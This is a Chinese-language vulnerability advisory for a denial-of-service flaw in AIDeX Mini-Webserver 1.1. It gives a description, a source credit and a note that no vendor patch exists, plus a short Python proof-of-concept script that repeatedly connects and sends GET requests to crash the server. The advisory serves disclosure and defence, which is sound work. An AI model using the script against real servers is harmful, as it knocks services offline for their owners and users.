AIDeX Mini-Webserver HTTP请求远程拒绝服务漏洞
发布日期:2006-12-29
更新日期:2006-12-30
受影响系统:AIDeX Mini-Webserver 1.1
描述:
BUGTRAQ ID:
21816
AIDeX Mini-WebServer是一款简单易用功能强大的Web服务器程序。
AIDeX在GUI中显示当前HTTP请求时存在错误,允许攻击者发送恶意的HTTP请求(如GET、HEAD)导致服务器崩溃。
利用此漏洞需要用户在接收HTTP请求时正在访问GUI日志窗口。
<*来源:shinnai (
shinnai@autistici.org)
链接:
http://secunia.com/advisories/23569/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
import socket
print "---------------------------------------------------------------------"
print "# AID'eX Mini-Webserver Verion 1.1 early Release 3 Denial of Service"
print "# url:
http://www.aidex.de/software/webserver/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site:
http://shinnai.altervista.org"
print "# soundtrack: "Suzanne" (Leonard Cohen)
print "---------------------------------------------------------------------"
host = "127.0.0.1"
port = 80
for i in range (0,100):
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send("GET / HTTP/1.0 \n\n")
建议:
厂商补丁:
AIDeX
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.aidex.de/software/webserver/浏览次数:2678
严重程度:0(网友投票)
